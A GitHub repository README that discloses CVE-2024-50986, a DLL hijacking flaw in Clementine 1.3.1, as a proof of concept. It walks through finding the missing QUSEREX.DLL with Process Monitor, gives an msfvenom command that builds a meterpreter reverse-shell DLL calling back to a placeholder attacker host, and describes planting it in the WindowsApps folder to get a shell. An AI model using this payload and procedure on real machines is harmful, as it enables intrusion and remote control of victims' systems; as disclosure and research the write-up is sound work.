Skip to content

An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file (DLL Hijacking)

License

Notifications You must be signed in to change notification settings

riftsandroses/CVE-2024-50986

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

CVE-2024-50986: DLL Hijacking Exploit for Clementine

Description: An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file.

Version Affected: Clementine v.1.3.1

Researcher: Utkarsh (r1971d3) LinkedIn

NIST CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2024-50986

Vulnerability Type: Untrusted Search Path

Affected Component: QUSEREX.DLL

Proof-of-Concept Exploit

Attack Vector

To exploit this vulnerability, an attacker must craft a malicious DLL named QUSEREX.DLL and place it in the directory: C:\Users<username>\AppData\Local\Microsoft\WindowsApps. When the Clementine application is launched, it will load the malicious DLL, executing the attacker's code.

Description & Usage

  1. Use Process Monitor (procmon) with appropriate filters to identify missing DLLs and track where Clementine is searching for them within the Windows Operating System

Capture_3

  1. The search reveals that the DLL "QUSEREX.DLL" is being looked for in multiple locations, including C:\Users<username>\AppData\Local\Microsoft\WindowsApps\

Capture_4

  1. A malicious DLL is created using msfvenom with the following command:
sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL

Capture_5

  1. This malicious DLL is placed in the directory C:\Users<username>\AppData\Local\Microsoft\WindowsApps, where it is successfully loaded by Clementine.

Capture_6

  1. Using msfconsole, a staged payload is sent through the reverse shell, resulting in a meterpreter shell session being obtained in the C:\Program Files (x86)\Clementine\projectm-presets directory on the target machine.

Capture_7

Capture_8

About

An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file (DLL Hijacking)

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published